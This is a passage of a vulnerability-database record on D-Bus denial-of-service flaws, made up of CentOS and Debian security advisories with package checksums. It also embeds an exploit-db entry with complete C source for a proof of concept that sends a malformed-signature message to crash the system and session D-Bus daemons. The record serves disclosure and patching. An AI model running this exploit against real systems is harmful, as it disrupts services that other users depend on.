advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-January/027568.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-January/027569.html\n\n**Affected packages:**\ndbus\ndbus-devel\ndbus-x11\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0008.html", "edition": 3, "modified": "2009-01-08T16:06:25", "published": "2009-01-08T16:06:24", "href": "http://lists.centos.org/pipermail/centos-announce/2009-January/027568.html", "id": "CESA-2009:0008", "title": "dbus security update", "type": "centos", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-20T18:27:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0018\n\n\nD-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\nnot correctly fix the denial of service flaw in the system for sending\nmessages between applications. A local user could use this flaw to send a\nmessage with a malformed signature to the bus, causing the bus (and,\nconsequently, any process using libdbus to receive messages) to abort.\n(CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying it\nin production environments.\n\nAll users are advised to upgrade to these updated packages, which contain a\nbackported patch to correct this issue. For the update to take effect, all\nrunning instances of dbus-daemon and all running applications using the\nlibdbus library must be restarted, or the system rebooted.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028471.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028472.html\n\n**Affected packages:**\ndbus\ndbus-devel\ndbus-libs\ndbus-x11\n\n**Upstream details at:**\n", "edition": 3, "modified": "2010-01-08T01:04:41", "published": "2010-01-08T01:04:41", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/028471.html", "id": "CESA-2010:0018", "title": "dbus security update", "type": "centos", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T03:08:44", "description": "D-Bus Daemon < 1.2.4 (libdbus) Denial of Service Exploit. CVE-2008-3834. Dos exploits for multiple platform", "published": "2009-01-19T00:00:00", "type": "exploitdb", "title": "D-Bus Daemon < 1.2.4 - libdbus Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-19T00:00:00", "id": "EDB-ID:7822", "href": "https://www.exploit-db.com/exploits/7822/", "sourceData": "/*\r\n * cve-2008-3834.c\r\n *\r\n * D-Bus Daemon Denial of Service < 1.2.4\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Usage:\r\n *\r\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\r\n * $ ./cve-2008-3834\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\r\n *\r\n * The dbus_signature_validate function in the D-bus library (libdbus) \r\n * before 1.2.4 allows remote attackers to cause a denial of service \r\n * (application abort) via a message containing a malformed signature,\r\n * which triggers a failed assertion error. \r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n\r\n#include <dbus/dbus.h>\r\n\r\n#define DEST \"org.freedesktop.ExampleService\"\r\n#define NAME \"org.freedesktop.ExampleInterface.ExampleMethod\"\r\n#define PATH \"/org/freedesktop/sample/object/name\"\r\n#define SIGNAL \"ExampleMethod\"\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n\tchar sig[8];\r\n\tuint32_t val = 0xdeadbeef;\r\n\tDBusMessage *message;\r\n\tDBusConnection *system, *session;\r\n\tDBusMessageIter iter1, iter2, iter3, iter4;\r\n\r\n\tprintf(\"[+] creating malicious dbus message...\\n\");\r\n\r\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\r\n\tif (!message) {\r\n\t\tprintf(\"[-] error: could not create dbus message\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tif (!dbus_message_set_destination(message, DEST)) {\r\n\t\tprintf(\"[-] error: could not create set dbus destination\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\r\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\r\n\tsig[2] = DBUS_TYPE_INT32;\r\n\tsig[3] = DBUS_TYPE_INT32;\r\n\tsig[4] = DBUS_STRUCT_END_CHAR;\r\n\tsig[5] = DBUS_TYPE_INT32;\r\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\r\n\tsig[7] = '\\0';\r\n\r\n\tdbus_message_iter_init_append(message, &iter1);\r\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\r\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\r\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter3, &iter4);\r\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter2, &iter3);\r\n\tdbus_message_iter_close_container(&iter1, &iter2);\r\n\r\n\tprintf(\"[+] connecting to dbus system daemon...\\n\");\r\n\r\n\tsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);\r\n\r\n\tif (system) {\r\n\t\tprintf(\"[+] killing dbus system daemon...\\n\");\r\n\r\n\t\tdbus_connection_send(system, message, NULL);\r\n\t\tdbus_connection_flush(system);\r\n\t\tdbus_connection_unref(system);\r\n\t} else {\r\n\t\tprintf(\"[-] error: could not connect to dbus system daemon\\n\");\r\n\t}\r\n\r\n\tprintf(\"[+] connecting to dbus session daemon...\\n\");\r\n\r\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\r\n\r\n\tif (session) {\r\n\t\tprintf(\"[+] killing dbus session daemon...\\n\");\r\n\r\n\t\tdbus_connection_send(session, message, NULL);\r\n\t\tdbus_connection_flush(session);\r\n\t\tdbus_connection_unref(session);\r\n\t} else {\r\n\t\tprintf(\"[-] error: could not connect to dbus session daemon\\n\");\r\n\t}\r\n\r\n\tdbus_message_unref(message);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-01-19]\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7822/"}], "debian": [{"lastseen": "2020-11-11T13:23:48", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1658-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 22, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dbus\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-3834\nDebian Bug : 501443\n\nColin Walters discovered that the dbus_signature_validate function in \ndbus, a simple interprocess messaging system, is prone to a denial of \nservice attack.\n\nFor the stable distribution (etch), this problem has been fixed in \nversion 1.0.2-1+etch2.\n\nFor the testing distribution (lenny) and unstable distribution (sid) \nthis problem will be fixed soon.\n\nWe recommend that you upgrade your dbus package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2.dsc\n Size/MD5 checksum: 824 476bb3df500c50f67b4088317482e0ef\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2.diff.gz\n Size/MD5 checksum: 19909 27df2fd0bc5cb93069d6c10d89e0214a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2.orig.tar.gz\n Size/MD5 checksum: 1400278 0552a9b54beb4a044951b7cdbc8fc855\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.0.2-1+etch2_all.deb\n Size/MD5 checksum: 1623126 68e4e1787515928f95af670ec2677663\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 403640 fa77ef6e2fc986018a1b6074b3ae9343\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 184728 631b1a1ed1215eb05a696b40a72db26c\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 378152 662bea6b7c1db00fdf933b53a2334f7d\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 289022 3ebba7555c92b42fdfe9331c35fbafc6\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 279202 dfbd440a6a800eea8ba2e46b692dd636\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 348548 ccc32fdddbaca40a7e62cffc250d493a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 363840 fd13ad30b922eff52503762ba60d08e0\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 184096 cb1028347d48476de045ad633939119a\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 331110 508d164df564a28f626b1941bf784bcd\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 183846 34fc9addad9e6e1858107a9382fc89e4\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 343302 dd43eeb35c44bb838d45d6324f9842fb\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 265858 e2438b408ec289d96454d30c971a1eeb\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 184866 7b0aa00c72398485849a46c3a376b5a3\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 375644 6146db75333cc23bcf98184886e2358f\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 362346 5002551bf82c33092fdd3fee8356078d\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 285994 55964151812beb09104dadc5fe883ded\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 335874 116b0084af4713242092e2b07a64734f\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 349844 cfa20eea1e6e8be195d520199e8415c6\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 184284 98c8270b762a20bffc194124562c2a68\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 269032 ebf1993ab8d40f4d10becd43324c3fb7\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 439328 0e4d4761c026e5d1a1d0fec1a2e2cc59\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 186576 9a83ca03b18ba3bbaa0e976c73e5ee49\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 411494 c4e44af1f20c10c57205270249f337a9\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 322378 94081937e3524ee2faecb311d0b55772\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 370622 4bdcd5653af2b8d82005e4f517b9b4b4\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 183866 413cae07b1a9058a0c6aebdd7f8ea027\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 272250 6d0e938439d3eb8ca62606630b8c3703\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 359500 7f221dd76f85d4ba43e2f9de932a0e2d\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_mipsel.deb\n Size/MD5 checksum: 184158 fb889a6d77b704244d791a6eacc6bdd7\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_mipsel.deb\n Size/MD5 checksum: 369594 90c29c9d9647268f0b44b94a01de0f45\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_mipsel.deb\n Size/MD5 checksum: 358738 cd6052fccfc4fefdda2ca7bf42823922\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_mipsel.deb\n Size/MD5 checksum: 272356 c61c0d2c433d4300df31bc681d0d0edd\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 271688 b4fa35b2b6d5d106043064b321c62ff7\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 353198 192e72c7dabd1d8d7b64a755293969b9\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 184192 0a4598f9d41f45a4f8d99982258bc352\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 335480 4267b587cd7d75ea76dc36ec679bb2d6\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 355016 839cfa24a74c834cba9161faaf7621e0\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 285310 d7265f270c738d91c19bfaeeff8130a7\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 184598 86f3ad1f997139c8f2c18105417f369b\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 373294 8e8fbab4cf0f0214dbd64e6faaf1a87a\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 340024 74d40edc715045d8693421b4093168c8\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 184162 32f294e0f8a06390053f8592cfce1f4d\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 336182 65adba9662394147aad1d34bb5ac90a4\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 265080 9d47f318df9648ad5988c36e30d63016\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-10-22T19:50:48", "published": "2008-10-22T19:50:48", "id": "DEBIAN:DSA-1658-1:215BD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00250.html", "title": "[SECURITY] [DSA 1658-1] New dbus packages fix denial of service", "type": "debian", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:30:31", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1837-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJuly 18, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dbus\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id : CVE-2009-1189\nDebian Bug : 532720\n\n\nIt was discovered that the dbus_signature_validate function in\ndbus, a simple interprocess messaging system, is prone to a denial of\nservice attack. This issue was caused by an incorrect fix for\nDSA-1658-1.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.2.1-5+lenny1.\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 1.0.2-1+etch3.\n\nPackages for ia64 and s390 will be released once they are available.\n\nFor the testing distribution (squeeze) and the unstable distribution\n(sid), this problem has been fixed in version 1.2.14-1.\n\n\nWe recommend that you upgrade your dbus packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.diff.gz\n Size/MD5 checksum: 20482 fd114e50577aade0211a25bc05ac064d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2.orig.tar.gz\n Size/MD5 checksum: 1400278 0552a9b54beb4a044951b7cdbc8fc855\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.dsc\n Size/MD5 checksum: 824 0befb91739de13f92197336b6a3f3f06\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.0.2-1+etch3_all.deb\n Size/MD5 checksum: 1622204 67e2242179a8af1f3a7363d0d9728702\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 289142 2da5aaed2ca0e1dfe4627f2d51923a1a\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 184834 a14af28f5651f06cd41f4aa8b264d486\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 378214 95128d7c15be44464dd1a785788fdc3d\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 403766 5facc50da806d2f82a1ca839e045035d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 279294 6b0085ce0a01a81a13b068759de269b8\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 348654 4d1f1c1d5c074be51b777b93b332eaf7\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 363928 54ed19ba7cbd0dd3475827c6e6df5acf\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 184200 e5bc33b1e7dbfea9c372a3056e3f1848\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 343960 e7c6c2269903d8dbd4422103a9e1edaf\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 265322 4e7ce3fca8c685e540092e70474e6fbd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 330958 cee5e85136606605bd290035d9452f90\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 183240 d7e3c477f4f4fbbc49c04b035e92ff2a\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 374136 7d297f74e9fde26e726f06f321208dae\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 286074 0a55d6aa6400d4d5750ebd92e9de7aab\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 362166 013680aca7b38c66292a8727855bfc06\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 184934 061417fe2e791b5bc7abf62398b3a8a8\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 335758 605f4f911d8445b74cbd46ede0fcfb89\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 268688 c64ca51e9e04d1e961a8db7132ba4e08\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 184134 58672102a58bca326f4ba09c5bf3666a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 348012 ae8f836c9e5b631eb421f3b86dc78f49\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 370052 f8ea51037f985d6b8f2a288b9a813ccd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 359844 b0b0956206921cff260c531aa9286f21\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 184240 4dd808980afe395d6909549614fab214\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 272764 7ceea85232267e0a80f4fd5cb38ddf09\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 369664 07d0e90fc376acf855563baec0293856\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 184260 f81b2223f912a359a4fd7bc1f61ba7e4\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 358830 947820464929873955f7f6a427403838\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 272442 3d19769e8260b3d434e6dd577d72c5c0\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 184222 c06ffd6735f13d9f6c9301a0dd487efd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 335910 9fe78e085108bbacb7f04566247aa51e\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 271718 021c33a25a85bcdc394fc0c5af784256\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 353656 9e40213397ea8306184da6c8e0bcb070\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 184266 d82e92039c32386a69e0f1b119820ae8\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 265144 d7f6e34015d0adc757942c6d1dae3c56\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 341300 3bb2b297ebd12d562b0185b6b58196a8\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 337130 1b9530365393919e15ffce3a695441ea\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.dsc\n Size/MD5 checksum: 1608 e084fe269b41c84cdeaafae2b2633e9f\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1.orig.tar.gz\n Size/MD5 checksum: 1406833 b57aa1ba0834cbbb1e7502dc2cbfacc2\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1.diff.gz\n Size/MD5 checksum: 39470 6b875822ae5036ba8bf83f2fae11fbf0\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.2.1-5+lenny1_all.deb\n Size/MD5 checksum: 1830232 317e72d84e019f0006d84e9579fa4b66\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 380740 b75e7906989484738737bc2e5e6bf66a\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 290338 fa8f5deeed2593a790283210375bde43\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 170160 810c545ad2bf6212fcb745f10f3d39c9\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_alpha.deb\n Size/MD5 checksum: 66942 c810abd2e002daefa1f24942367208ce\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 259300 9086503f08d3a4970c966cb1461b8309\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 162880 12a802692ae3d1774a5cb2a55fee7abe\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 64710 62a4fbb57742faed71a853cd7c6d5443\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_amd64.deb\n Size/MD5 checksum: 249006 966d8f20171594a83abd09251c277dd1\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-x11_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 63812 f9acaf50dd1440312f9b3eb9e8ce5665\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 223424 20befb04db3b6ae82fb152354be8cf1f\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_arm.deb\n Size/MD5 checksum: 238514 0369f89685fa04a26ba050b5ae718368\n 